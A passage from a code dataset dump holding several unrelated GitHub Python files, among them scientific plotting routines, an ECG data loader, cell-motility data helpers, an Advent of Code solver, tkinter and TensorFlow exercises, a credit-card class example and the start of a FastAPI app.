N_2} $ (eV)') \n \n\n vf.confirm_0( dmax.std() )\n str1 = 'with $N_d = %d$' %( dmax[0] ) \n vf.my_text(ax1[0], str1, 0.5, 0.9, ha='center' )\n\n create_abc(ax1)\n\n figname = '%s_2.pdf' %(filename[0:-4])\n plt.savefig(figname)\n plt.close('all')\n\n\n\n\n def plot_lepi_res_ntrain(self, filename): \n lepi_res = vf.my_read_pkl(filename) \n \n dmax = np.array([])\n ntrain = np.array([])\n \n pe_train = np.array([])\n pe_test = np.array([])\n \n Vnm = np.zeros(lepi_res[0].dmax) # a specific pair nm \n \n for i in np.arange( len(lepi_res) ):\n dmax = np.append( dmax, lepi_res[i].dmax ) \n ntrain = np.append( ntrain, lepi_res[i].ntrain ) \n \n pe_train = np.append( pe_train, lepi_res[i].pe_train ) \n pe_test = np.append( pe_test, lepi_res[i].pe_test ) \n \n Vnm = np.vstack([Vnm, lepi_res[i].epi[:,0,1]])\n Vnm=np.delete(Vnm, 0, 0) \n \n \n ax1 = create_ax1() \n fig_xlim = [0, ntrain[-1]]\n\n for j in np.arange(Vnm.shape[1]):\n str1 = '$d_{%d}$' %(j+1)\n ax1[0].plot( ntrain, Vnm[:,j], '-', label=str1 )\n ax1[0].plot( fig_xlim, [0, 0], '--', color='gray' ) \n \n ax1[1].plot( ntrain, pe_train, '-', color='C0', label='training set')\n ax1[1].plot( ntrain, pe_test, '-', color='C1', label='testing 
set')\n \n filename2 = '%s.sdUss_tilde.txt' %(filename[0:-4])\n if os.path.exists(filename2) :\n sigma_dUss_tilde = np.loadtxt(filename2) \n ax1[2].plot( ntrain, sigma_dUss_tilde, '-', color='C2')\n \n\n ax1[0].legend( fontsize=6, loc='lower left', ncol=2) \n ax1[1].legend( fontsize=6, loc='lower left' ) \n # ax1[2].legend( fontsize=6, loc='lower left' ) \n\n ax1[2].set_xlim( fig_xlim )\n ax1[2].set_xlabel('$N_\\\\mathrm{train}$')\n\n ax1[0].set_ylim([-0.06, 0.04]) \n ax1[1].set_ylim([0, 1]) \n ax1[2].set_ylim([0, 0.06]) \n\n ax1[0].set_ylabel('EPI $V_{\\\\mathrm{AuNi}, d}$ (eV)')\n ax1[1].set_ylabel('percent error')\n ax1[2].set_ylabel('EPI-based $\\\\widetilde{\\\\sigma}_{\\\\Delta U_{s-s}}$ (eV)') \n\n\n vf.confirm_0( dmax.std() )\n str1 = 'with $N_d = %d$' %( dmax[0] ) \n vf.my_text(ax1[0], str1, 0.5, 0.9, ha='center' )\n\n create_abc(ax1)\n\n figname = '%s.pdf' %(filename[0:-4])\n plt.savefig(figname)\n plt.close('all')\n\n\n\n\n\n\n #============================================\n # plot lepi_res - dmax \n #============================================\n\n def plot_lepi_res_dmax(self, filename): \n lepi_res = vf.my_read_pkl(filename) \n\n dmax = np.array([])\n ntrain = np.array([])\n pe_train = np.array([])\n pe_test = np.array([])\n sE_train = np.array([])\n sE_test = np.array([])\n\n Vnm = np.ones([ len(lepi_res), lepi_res[-1].dmax ]) *1e6\n\n for i in np.arange( len(lepi_res) ):\n dmax = np.append( dmax, lepi_res[i].dmax )\n ntrain = np.append( ntrain, lepi_res[i].ntrain ) \n pe_train = np.append( pe_train, lepi_res[i].pe_train ) \n pe_test = np.append( pe_test, lepi_res[i].pe_test ) \n sE_train = np.append( sE_train, lepi_res[i].E_train.std() ) \n sE_test = np.append( sE_test, lepi_res[i].E_test.std() ) \n\n Vnm[i, 0:(lepi_res[i].dmax) ] = lepi_res[i].epi[:, 0, 1] \n\n vf.confirm_0( ntrain.std() )\n vf.confirm_0( sE_train.std() )\n vf.confirm_0( sE_test.std() )\n\n\n ax1 = create_ax1() \n fig_xlim = [dmax[0], dmax[-1]]\n\n for j in np.arange(Vnm.shape[1]): \n temp = Vnm[:,j]\n mask = ( temp != 1e6 ) \n xi = dmax[mask]\n yi = temp[mask] \n str1 = '$d_{%d}$' %(j+1)\n\n if j < 1.1:\n alpha = 1 \n elif j < 4.1:\n alpha = 0.7\n else:\n alpha = 0.4 \n\n ax1[0].plot( xi, yi, '-o', label=str1, alpha=alpha) \n ax1[0].plot( fig_xlim, [0, 0], '--', color='gray' ) \n\n\n str1 = 'training set, std = %.3f meV/atom' %(sE_train[0]*1e3) \n str2 = 'testing set, std = %.3f meV/atom' %(sE_test[0] *1e3) \n ax1[1].plot( dmax, pe_train, '-s', color='C0', label=str1)\n ax1[1].plot( dmax, pe_test, '-o', color='C1', label=str2)\n \n filename2 = '%s.sdUss_tilde.txt' %(filename[0:-4])\n if os.path.exists(filename2):\n sigma_dUss_tilde = np.loadtxt(filename2) \n ax1[2].plot( dmax, sigma_dUss_tilde, '-s', color='C2')\n\n\n ax1[0].legend( fontsize=6, loc='lower left', ncol=2) \n ax1[1].legend( fontsize=6, loc='lower left' ) \n\n ax1[2].set_xlim( fig_xlim )\n\n # xt = ax1[2].get_xticks()\n # xtl = ax1[2].get_xticklabels()\n # for i in np.arange(len(xt)):\n # str1 = '$ d_{%d} $' %( xt[i] ) \n # xtl[i] = str1 \n # ax1[2].set_xticks(xt) \n # ax1[2].set_xticklabels(xtl) \n\n ax1[2].set_xlabel('$N_d$')\n\n ax1[0].set_ylim([-0.06, 0.04]) \n ax1[1].set_ylim([0, 1]) \n ax1[2].set_ylim([0, 0.06]) \n\n ax1[0].set_ylabel('EPI $V_{\\\\mathrm{AuNi}, d}$ (eV)')\n ax1[1].set_ylabel('percent error')\n ax1[2].set_ylabel('EPI-based $ \\\\widetilde{\\\\sigma}_{\\\\Delta U_{s-s}} $ (eV)')\n\n\n str1 = 'with $N_\\\\mathrm{train} = %d$' %( ntrain[0] ) \n vf.my_text(ax1[0], str1, 0.5, 0.9, ha='center' )\n\n create_abc(ax1)\n\n figname 
= '%s.pdf' %(filename[0:-4])\n plt.savefig(figname)\n plt.close('all')\n\n\n\n\n\n\n\n\ndef create_ax1():\n fig_wh = [3, 6]\n fig_subp = [3, 1]\n fig1, ax1 = vf.my_plot(fig_wh, fig_subp)\n \n fig_pos = np.array([0.24, 0.71, 0.68, 0.26])\n for i in np.arange(fig_subp[0]):\n ax1[i].set_position( fig_pos + np.array([0, -0.32*i, 0, 0]) )\n\n return ax1 \n\n\n\ndef create_ax2():\n fig_wh = [3, 2.2]\n fig_subp = [1, 1]\n fig1, ax1 = vf.my_plot(fig_wh, fig_subp)\n \n fig_pos = np.array([0.24, 0.18, 0.68, 0.75])\n ax1.set_position( fig_pos )\n\n return ax1 \n\n\n\n\ndef create_abc(ax1):\n x = -0.31\n y = 1.02\n\n str1 = '(a)'\n vf.my_text(ax1[0], str1, x, y, weight='bold')\n\n str1 = '(b)'\n vf.my_text(ax1[1], str1, x, y, weight='bold')\n\n str1 = '(c)'\n vf.my_text(ax1[2], str1, x, y, weight='bold') \n\n\n\n\n\n\n\n\n\n","repo_name":"BinglunYin/myalloy_package","sub_path":"myvasp/vasp_epi_fit.py","file_name":"vasp_epi_fit.py","file_ext":"py","file_size_in_byte":13523,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"23597302600","text":"\nimport os\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef create_subseq(ts, look_back, pred_length):\n sub_seq, next_values = [], []\n for i in range(len(ts)-look_back-pred_length): \n sub_seq.append(ts[i:i+look_back])\n next_values.append(ts[i+look_back:i+look_back+pred_length].T[0])\n return sub_seq, next_values\n\n\ndef load(name='ecg', split=0.2):\n if name.lower() == \"ecg\":\n df = pd.read_csv(\"http://www.cs.ucr.edu/~eamonn/discords/qtdbsel102.txt\", header=None, delimiter='\\t')\n ecg = df.iloc[:,2].values\n ecg = ecg.reshape(len(ecg), -1)\n print('length of ECG data : ', len(ecg))\n\n # standardize\n scaler = StandardScaler()\n std_ecg = scaler.fit_transform(ecg)\n std_ecg = std_ecg[:5000]\n\n look_back = 10\n pred_length = 3\n\n sub_seq, next_values = create_subseq(std_ecg, look_back, pred_length) \n return np.array(sub_seq), np.array(next_values), std_ecg\n return\n","repo_name":"yuetan1988/tf-outlier-detection","sub_path":"tfod/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"3958441213","text":"'''\nTools for manipulating data structures.\nTODO : refactor and replace with standard `pandas` implementations.\n'''\nfrom __future__ import print_function, division\nimport numpy as np\n\ndef dict2array(d):\n '''\n Merges a dict of lists into a list of lists with the same order.\n\n Parameters\n ----------\n d : dict.\n\n Returns\n -------\n output : list.\n list of lists.\n order : list.\n keys from dict in order of listing.\n '''\n output = []\n order = []\n for u in d:\n output.append(list(d[u]))\n order.append(u)\n return output, order\n\ndef dictofdict2array(top_dict):\n '''\n Converts a dictionary of dictionaries with scalar values and converts\n to a list of lists.\n\n Parameters\n ----------\n top_dict : dict\n i.e. { a: {x1 : a1, x2 : a2, x3 : a3},\n b: {x1 : b1, x2 : b2, x3 : b3} }\n Returns\n -------\n output : list\n i.e. 
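a list with one row per inner key, gathering values across the outer dicts.\n        A hedged worked example (invented values):\n\n            dictofdict2array({'a': {'x1': 1, 'x2': 2}, 'b': {'x1': 3, 'x2': 4}})\n            # -> ([[1, 3], [2, 4]], ['x1', 'x2'])\n\n        With three outer dicts a, b, c (two inner keys each) this reads\n        i.e. 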
[ [a1, b1, c1], [a2, b2, c2] ]\n    order : list\n        keys of top_dict, ordered as listed.\n    '''\n    output = []\n    order = []\n    N = len( top_dict[ list(top_dict)[0] ] ) # number of cells\n    i = 0\n    while i < N:\n        row = []\n        for key1 in top_dict:\n            key2 = list(top_dict[key1])[i]\n            #print(key2)\n            order.append(key2)\n\n            row.append( top_dict[key1][key2] )\n        output.append(row)\n        i += 1\n    return output, dedupe(order)\n\ndef tripledict2array(top_dict):\n    '''\n    Converts a tertiary leveled dictionary to a list of lists.\n\n    Parameters\n    ----------\n    top_dict : dict\n        i.e. { a: {x1 : {y1 : [z1,]}, x2 : {y2: [z2,]} },\n               b: {x1 : {y1 : [z1,]}, x2 : {y2: [z2, z3, z4]} } }\n\n    Returns\n    -------\n    output : list\n        i.e. [[z1, z2], [z1, z2, z3, z4]]\n    order : list.\n        keys of the tertiary dictionaries, ordered as listed.\n    '''\n    output = []\n    order1 = []\n    order2 = []\n    order3 = []\n    j = 0\n    while j < len( top_dict[ list(top_dict)[0] ][ list(top_dict[ list(top_dict)[0] ])[0] ] ):\n        row = []\n        for key1 in top_dict:\n            order1.append(key1)\n            for key2 in top_dict[key1]:\n                order2.append(key2)\n                order3.append(list(top_dict[key1][key2])[j])\n                if type(top_dict[key1][key2][ list(top_dict[key1][key2])[j] ]) == list:\n                    for item in top_dict[key1][key2][ list(top_dict[key1][key2])[j] ]:\n                        row.append(item)\n                else:\n                    row.append( top_dict[key1][key2][ list(top_dict[key1][key2])[j] ] )\n        output.append(row)\n        j += 1\n    return output, dedupe(order3)\n\ndef cell_ids2tracks(cell_ids):\n    '''\n    Converts a `cell_ids` dict to `tracksX` and `tracksY` (N,T) coordinate arrays.\n\n    Parameters\n    ----------\n    cell_ids : dict\n        cell paths, keyed by an `id`, values are lists of (x,y) coordinate tuples.\n\n    Returns\n    -------\n    tracksX, tracksY : ndarray.\n        N x T arrays of X and Y locations respectively\n    '''\n    N = len(cell_ids)\n    T = len(cell_ids[list(cell_ids)[0]])\n    tracksX = np.zeros([N,T])\n    tracksY = np.zeros([N,T])\n\n    n_count = 0\n    for c in cell_ids:\n        cell = cell_ids[c]\n        for t in range(T):\n            tracksX[n_count, t] = cell[t][0]\n            tracksY[n_count, t] = cell[t][1]\n        n_count = n_count + 1\n\n    return tracksX, tracksY\n\n\ndef dedupe(seq, idfun=None):\n    '''\n    Deduplicates lists.\n    '''\n    # order preserving\n    if idfun is None:\n        def idfun(x): return x\n    seen = {}\n    result = []\n    for item in seq:\n        marker = idfun(item)\n        # in old Python versions:\n        # if seen.has_key(marker)\n        # but in new ones:\n        if marker in seen: continue\n        seen[marker] = 1\n        result.append(item)\n    return result\n\nimport itertools\ndef merge_flat_lists(lists):\n    '''\n    Merges a tertiary list of lists into a secondary list of lists.\n\n    Parameters\n    ----------\n    lists : list.\n        tertiary list of lists [ [[a0,a1,a2], [b0,b1,b2]] ]\n\n    Returns\n    -------\n    merged_list : list.\n        secondary list of lists [[a0,a1,a2,b0,b1,b2]]\n    '''\n    merged_list = []\n    n_rows = len(lists[0])\n    i = 0\n    while i < n_rows:\n        tmp_list = []\n        for l in lists:\n            tmp_list.append(l[i])\n\n        tmp_merged = list( itertools.chain( *tmp_list ) )\n        merged_list.append(tmp_merged)\n        i += 1\n\n    # merged_list = [ [all vals for one cell], [...], ... 
]\n    return merged_list\n\ndef single_outputs_list(cell_ids, gf, rwf, msdf, output_dir, suffix=None):\n    '''\n    Creates a list of lists list[N][M] of cell statistics for CSV export.\n\n    Parameters\n    ----------\n    cell_ids : dict\n        cell paths, keyed by an `id`, values are lists of (x,y) coordinate tuples.\n\n    gf : hmstats.GeneralFeatures object\n    rwf : hmstats.RWFeatures object\n    msdf : hmstats.MSDFeatures object\n    output_dir : string\n        path to output directory.\n    suffix : string\n        suffix appended to output filenames.\n\n    Returns\n    -------\n    output_list : list\n        list of lists, output_list[N][M], where `N` is cells and `M` is features.\n    '''\n    # Creates a list of lists for writing out statistics\n    # Ea. internal list is a single cell's stats\n    output_list = []\n    if suffix:\n        output_dir = output_dir + str(suffix)\n    for cell in cell_ids:\n        output_list.append([ output_dir, cell, gf.total_distance[cell], gf.net_distance[cell],\n        gf.linearity[cell], gf.spearmanrsq[cell], gf.progressivity[cell], gf.max_speed[cell],\n        gf.min_speed[cell], gf.avg_speed[cell], msdf.alphas[cell], rwf.hurst_RS[cell], rwf.nongaussalpha[cell],\n        rwf.disp_var[cell], rwf.disp_skew[cell], rwf.diff_linearity[cell], rwf.diff_net_dist[cell] ])\n\n    return output_list\n\n\ndef fix_order(correct_order, new_order, sorting):\n    '''\n    Fixes the order of a list in `sorting` with `new_order` to\n    match the index order laid out in `correct_order`.\n\n    Parameters\n    ----------\n    correct_order : list.\n        contains keys in the correct order, guides sorting of the list `sorting`\n    new_order : list.\n        contains same set of keys in correct_order, but in a different order.\n    sorting : list.\n        list to be sorted based on the order in `correct_order`.\n    '''\n    # if order is correct, return input seq\n    if correct_order == new_order:\n        return sorting, new_order\n\n    new_idx_order = [] # idx's of `correct_order[i]` loc in `new_order`\n    for i in correct_order:\n        new_idx_order += [new_order.index(i)]\n\n    reordered_vals = []\n    reordered_keys = []\n    for i in range(len(new_idx_order)):\n        reordered_vals += [sorting[new_idx_order[i]]]\n        reordered_keys += [new_order[new_idx_order[i]]]\n\n    assert correct_order == reordered_keys, 'keys not correctly ordered in `fix_order()`'\n    return reordered_vals, reordered_keys\n\n\ndef make_merged_list(ind_outputs, gf, rwf):\n    '''Merge output lists for all features\n\n    Parameters\n    ----------\n    ind_outputs : list\n        ind_outputs[N][M], where `N` is cells and `M` is features.\n    gf : hmstats.GeneralFeatures object\n    rwf : hmstats.RWFeatures object\n\n    Returns\n    -------\n    merged_list : list\n        merged_list[N][M], where `N` is cells and `M` is features.\n\n    Notes\n    -----\n    Uses `fix_order` and assertion checks to ensure that dictionary ordering\n    is not perturbed during concatenation, which can occur in Python2 where\n    dict primitive behavior is not robust to ordering in the manner of Python3.\n    This is not official support for Python2, merely an attempt to prevent\n    silent failure and generation of erroneous output.\n    '''\n\n    ind_order = []\n    for i in ind_outputs:\n        ind_order.append(i[1])\n\n    autocorr_array, autocorr_order = dict2array(rwf.autocorr)\n    autocorr_array, autocorr_order = fix_order(ind_order, autocorr_order, autocorr_array)\n    assert ind_order == autocorr_order, 'individual and autocorr not in same order'\n\n    diff_kurtosis_array, diff_kurtosis_order = dictofdict2array(rwf.diff_kurtosis)\n    diff_kurtosis_array, diff_kurtosis_order = fix_order(ind_order, diff_kurtosis_order, diff_kurtosis_array)\n    assert ind_order == 
diff_kurtosis_order, 'individual and diff_kurtosis not in same order'\n\n avg_moving_speed_array, avg_moving_speed_order = dictofdict2array( gf.avg_moving_speed )\n avg_moving_speed_array, avg_moving_speed_order = fix_order(ind_order, avg_moving_speed_order, avg_moving_speed_array)\n assert ind_order == avg_moving_speed_order, 'individual and avg_moving_speed not in same order'\n\n time_moving_array, time_moving_order = dictofdict2array( gf.time_moving )\n time_moving_array, time_moving_order = fix_order(ind_order, time_moving_order, time_moving_array)\n assert ind_order == time_moving_order, 'individual and time_moving not in same order'\n\n turn_list, turn_list_order = tripledict2array(gf.turn_stats)\n turn_list, turn_list_order = fix_order(ind_order, turn_list_order, turn_list)\n assert ind_order == turn_list_order, 'individual and turn_list not in same order'\n\n theta_list, theta_list_order = tripledict2array(gf.theta_stats)\n theta_list, theta_list_order = fix_order(ind_order, theta_list_order, theta_list)\n assert ind_order == theta_list_order, 'individual and theta_list not in same order'\n\n merged_list = merge_flat_lists([ind_outputs, diff_kurtosis_array, avg_moving_speed_array, time_moving_array, autocorr_array, turn_list, theta_list])\n return merged_list\n","repo_name":"cellgeometry/heteromotility","sub_path":"heteromotility/hmtools.py","file_name":"hmtools.py","file_ext":"py","file_size_in_byte":9644,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} +{"seq_id":"28380230204","text":"#a function to run the parser on a directory\nfrom new_dir_setup import new_dir_setup\nfrom event_parser_hdf5 import event_parser_hdf5\nfrom traj_parser import traj_parser\nfrom Wolff_Repo.Utils.simple import *\nimport os\n\nif ynprompt('Use text file? (y/n)'):\n datdir = open(get_file()).read().split('\\n')\nelse:\n\n #prompt user to select a directory\n datdir = [get_directory().replace('/','\\\\')]\n\ninclude_trajectories = ynprompt('Would you like to include trajectories? 
(y/n)')\n\nfor dir in datdir:\n    print(f'setting up {dir}')\n    #check if this directory has already been setup by seeing if it has the parser subfolder\n    if not 'parser' in os.listdir(dir):\n        new_dir_setup.setup(dir)\n    \n    #set the directory where the h5 file is located\n    active_dir = dir + r'\\parser'\n\n    #add paths to trajectory files for each rat\n    if include_trajectories:\n        traj_parser.setup_dir(active_dir)\n\n#loop through each directory and actually run parser\nfor dir in datdir:\n    print(f'parsing {dir}')\n\n    #set the directory where the h5 file is located\n    active_dir = dir + r'\\parser'\n\n    #run the parser\n    event_parser_hdf5.parsedirectory(active_dir, dir)\n    if include_trajectories:\n        traj_parser.parse_trajectories(active_dir)\n","repo_name":"WolffLab/Wolff_Repo","sub_path":"parser/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43099299479","text":"#!/usr/bin/env python3\nimport os\nfrom typing import List, Set, Tuple\nimport numpy as np\n\n\nclass Solver:\n    def __init__(self, filepath: str) -> None:\n        with open(filepath, 'r') as text_file:\n            groups = list(map(lambda data: data.split('\\n'), text_file.read().strip().split('\\n\\n')))\n        self.cards1 = list(map(int, groups[0][1:]))\n        self.cards2 = list(map(int, groups[-1][1:]))\n        self.game_count = 0\n        # Note: Debug mode prints interim results for part 2, as seen in the original examples of the puzzle.\n        # Use at your own risk! The number of games played for your puzzle input will be very high. It's over 9000!\n        self.debug_part2 = False\n\n    @staticmethod\n    def calculate_score(cards: List[int]) -> int:\n        return sum(np.multiply(cards, range(len(cards), 0, -1)))\n\n    def debug(self, *values: object) -> None:\n        \"\"\"Print values in debug mode only.\"\"\"\n        if self.debug_part2:\n            print(*values)\n\n    def play_recursive_combat(self, game: int, cards1: List[int], cards2: List[int]) -> Tuple[int, List[int], List[int]]:\n        \"\"\"Play a game of recursive combat, and return (winner, cards of player 1, cards of player 2).\"\"\"\n        self.game_count = game\n        configurations = set()  # type: Set[Tuple[Tuple[int, ...], Tuple[int, ...]]]\n        game_round = 0\n        self.debug(f\"=== Game {game} ===\\n\")\n        while cards1 and cards2:\n            configuration = (tuple(cards1), tuple(cards2))\n            # Check for repeated configuration.\n            if configuration in configurations:\n                # Win by infinite game prevention rule.\n                self.debug(f\"The winner of game {game} is player 1 due to the infinite game prevention rule!\\n\")\n                return 1, cards1, cards2\n\n            configurations.add(configuration)\n            if game_round > 0:\n                self.debug()\n            game_round += 1\n            self.debug(f\"-- Round {game_round} (Game {game}) --\")\n            self.debug(f\"Player 1's deck: {', '.join(str(card) for card in cards1)}\")\n            self.debug(f\"Player 2's deck: {', '.join(str(card) for card in cards2)}\")\n            # Draw cards.\n            card1, card2 = cards1.pop(0), cards2.pop(0)\n            self.debug(f\"Player 1 plays: {card1}\")\n            self.debug(f\"Player 2 plays: {card2}\")\n            # Check if a recursion is to be played.\n            if len(cards1) >= card1 and len(cards2) >= card2:\n                self.debug(\"Playing a sub-game to determine the winner...\\n\")\n                winner, _, _ = self.play_recursive_combat(self.game_count + 1, cards1[:card1], cards2[:card2])\n                self.debug(f\"...anyway, back to game {game}.\")\n            else:\n                winner = 1 if card1 > card2 else 2\n            # Assign cards to winner.\n            if winner == 1:\n                cards1.extend([card1, card2])\n            else:\n                cards2.extend([card2, card1])\n            
self.debug(f\"Player {winner} wins round {game_round} of game {game}!\")\n        # Win by regular combat.\n        winner = 1 if cards1 else 2\n        self.debug(f\"The winner of game {game} is player {winner}!\\n\")\n        return winner, cards1, cards2\n\n    def solve_part1(self) -> int:\n        cards1, cards2 = list(self.cards1), list(self.cards2)\n        while cards1 and cards2:\n            card1, card2 = cards1.pop(0), cards2.pop(0)\n            if card1 > card2:\n                cards1.extend([card1, card2])\n            else:\n                cards2.extend([card2, card1])\n        winner_cards = cards1 if cards1 else cards2\n        return self.calculate_score(winner_cards)\n\n    def solve_part2(self) -> int:\n        winner, cards1, cards2 = self.play_recursive_combat(1, list(self.cards1), list(self.cards2))\n        winner_cards = cards1 if winner == 1 else cards2\n        print(\"\\n== Post-game results ==\")\n        print(f\"Player 1's deck: {', '.join(str(card) for card in cards1)}\")\n        print(f\"Player 2's deck: {', '.join(str(card) for card in cards2)}\")\n        print()\n        print(f\"{self.game_count} games played.\")\n        return self.calculate_score(winner_cards)\n\n\nif __name__ == \"__main__\":\n    solver = Solver(os.path.join(os.path.dirname(__file__), \"input.txt\"))\n    print(solver.solve_part1())\n    print(solver.solve_part2())\n","repo_name":"docToolchain/aoc-2020","sub_path":"day22/python/asung/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"5"} +{"seq_id":"21305204619","text":"import tkinter as tk\n\nwindow = tk.Tk()\nwindow.title('listbox')\nwindow.geometry('400x400')\n\nvar1 = tk.StringVar()\n\nl = tk.Label(window, textvariable = var1, bg='yellow', width=4, height=2)\nl.pack()\n\ndef print_selection():\n    value = lb.get(lb.curselection())\n    var1.set(value)\nb = tk.Button(window, text='print_selection', width=15, height=2, command=print_selection)\nb.pack()\n\nvar2 = tk.StringVar()\nvar2.set((11,22,33,44))\nlb = tk.Listbox(window, listvariable=var2)\nlb.pack()\n\nlist_1=[1,2,3,4]\nfor i in list_1:\n    lb.insert('end',i)\nlb.insert(1,'a')\nlb.insert(2,'b')\nlb.delete(2)\n\nwindow.mainloop()","repo_name":"ivan1003hsu/python_work","sub_path":"tkinter/tkinter-3.py","file_name":"tkinter-3.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16990791626","text":"\ndef fact(n):\n    fact = 1\n    for i in range(1,n+1):\n        fact = fact * i\n    return fact\n\nfor _ in range(int(input())):\n    n = int(input())\n    print(fact(n))\n\n    \n#same approach without function\nfor _ in range(int(input())):\n    res=1\n    for num in range(1,int(input())+1):\n        res *= num\n    print(res)\n","repo_name":"annshiv/codechef","sub_path":"Beginner/Small factorial (FLOW018)/small_factorial.py","file_name":"small_factorial.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"12994148338","text":"\nimport tensorflow as tf\nimport os\nimport zipfile\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport matplotlib.pyplot as plt\nDESIRED_ACCURACY = 0.999\nlabels={0:'Happy',1:'Sad'}\n\n\nclass MyCallBack(tf.keras.callbacks.Callback):\n    def on_epoch_end(self, epoch, logs=None):\n        if logs[\"acc\"]>DESIRED_ACCURACY:\n            print(\"Accuracy reached 99.9%, stopping training\")\n            self.model.stop_training=True\ncallback=MyCallBack()\ndef generator(path):\n    train_gen= ImageDataGenerator(rescale=1/255.0)\n    train_data=train_gen.flow_from_directory(directory=path, 
target_size=(300,300),class_mode=\"binary\", batch_size=8)\n    return train_data\ndef build_model():\n    model=tf.keras.models.Sequential([\n    tf.keras.layers.Conv2D(64,3, activation=\"relu\",input_shape=(300,300,3)),\n    tf.keras.layers.MaxPooling2D(),\n    tf.keras.layers.Conv2D(64,3,activation=\"relu\"),\n    tf.keras.layers.MaxPooling2D(),\n    tf.keras.layers.Conv2D(64,3,activation=\"relu\"),\n    tf.keras.layers.MaxPooling2D(),\n    tf.keras.layers.Flatten(),\n    tf.keras.layers.Dense(512,activation=\"relu\"),\n    tf.keras.layers.Dense(1,activation=\"sigmoid\")\n    ])\n    model.compile(optimizer=\"adam\",loss=\"binary_crossentropy\",metrics=[\"acc\"])\n    return model\ndef plot_loss_acc(history):\n    epochs= range(len(history.history['acc']))\n    acc=history.history['acc']\n    loss=history.history['loss']\n    plt.plot(epochs,acc)\n    plt.title(\"Accuracy\")\n    plt.figure()\n    plt.plot(epochs,loss)\n    plt.title(\"Loss\")\n    plt.show()\n\ndata_gen=generator(\"Datasets/h-or-s\")\n# show_predictions(None,data_gen)\nmodel=build_model()\nhistory=model.fit(data_gen, epochs=10, callbacks=[callback])\nplot_loss_acc(history)","repo_name":"dj5/TF-Programs-for-Practice","sub_path":"TF_CNN/happy_or_sad_cnn.py","file_name":"happy_or_sad_cnn.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6655900581","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 29 17:08:48 2022\r\n\r\n@author: Abin\r\n\"\"\"\r\n\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\", message=\"Reloaded modules: \")\r\n\r\nfrom Credit_Card import CreditCard\r\n\r\n# Inheriting the CreditCard class\r\nclass PredatoryCreditCard(CreditCard):\r\n    \r\n    '''\r\n    The new constructor will have an additional new parameter,\r\n    Annual Percentage Rate (APR).\r\n    The body of our new constructor relies upon\r\n    making a call to the inherited constructor to perform most of the initialization (in\r\n    fact, everything other than the recording of the percentage rate).\r\n    '''\r\n    \r\n    def __init__(self, customer, bank, account, limit, apr):\r\n        '''\r\n        Creating a predatory credit card instance.\r\n        \r\n        The initial balance being 0.\r\n        \r\n        All the attributes being the same with an additional parameter being -->\r\n        APR: Annual Percentage Rate (0.0825 for 8.25% APR)\r\n        '''\r\n        super().__init__(customer, bank, account, limit) # Calling the super constructor\r\n        self._apr = apr\r\n        \r\n    # OVERRIDING the charge method from the Parent class\r\n    def charge(self, price):\r\n        '''\r\n        Charge given price to the card, assuming sufficient credit limit.\r\n        \r\n        Return True if charge was processed,\r\n        else return False and assess an extra $5 fee if the charge is denied.\r\n        '''\r\n        success = super().charge(price) # Calling the inherited method.\r\n        if not success:\r\n            self._balance += 5 # assess penalty\r\n        return success # caller expects some return\r\n        \r\n    def process_month(self):\r\n        '''\r\n        Assess monthly interest on outstanding balance.\r\n        '''\r\n        if self._balance > 0:\r\n            # if positive balance, convert APR to monthly multiplicative factor.\r\n            monthly_factor = pow(1 + self._apr, 1/12)\r\n            self._balance *= monthly_factor\r\n","repo_name":"Spartan-119/Book-Data-Structures-and-Algorithms-in-Python","sub_path":"Inheritance/Credit_Card/Predatory_Credit_Card.py","file_name":"Predatory_Credit_Card.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25750278979","text":"import 
os\nimport csv\nimport time\nfrom fastapi import Depends, FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom sqlalchemy import create_engine, event\nfrom sqlalchemy.orm import Session\nfrom app import crud, models, schemas\nfrom app.db import engine, get_db\n\napp = FastAPI()\n\nDATA_DIRECTORY = '/data'\n\norigins = [\n    \"http://localhost:3000\",\n    \"http://localhost\",\n]\n\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=origins,\n    allow_credentials=True,\n    allow_methods=[\"*\"],\n    allow_headers=[\"*\"],\n)\n\nINITIAL_DATA = { \"stations\": [], \"journeys\": [] }\n\ndef get_data():\n    with open(f'{DATA_DIRECTORY}/Helsinki_and_Espoo_city_bike_stations.csv') as csv_file:\n        reader = csv.reader(csv_file , delimiter=',', quotechar='\"', skipinitialspace=True)\n        headers = next(csv_file) \n        for line in reader:\n            station = { \"id\": line[1], \"name\": line[2], \"address\": line[5], \"city\": line[7] if line[7] else \"Helsinki\", \"capacity\": line[10], \"x\": line[11], \"y\": line[12]}\n            INITIAL_DATA[\"stations\"].append(station)\n    for file in os.listdir(f'{DATA_DIRECTORY}/journeys'):\n        count = 0\n        with open(f\"{DATA_DIRECTORY}/journeys/{file}\", newline=\"\") as csv_file:\n            reader = csv.reader(csv_file , delimiter=',', quotechar='\"', skipinitialspace=True)\n            headers = next(csv_file)\n            for row in reader:\n                if (count < 100):\n                    # Ignore distances smaller than 10m as well as durations of less than 10s\n                    if not row[6] or float(row[6]) < 10.0 or float(row[7]) < 10.0:\n                        continue\n                    journey = { \"departure_date\": row[0], 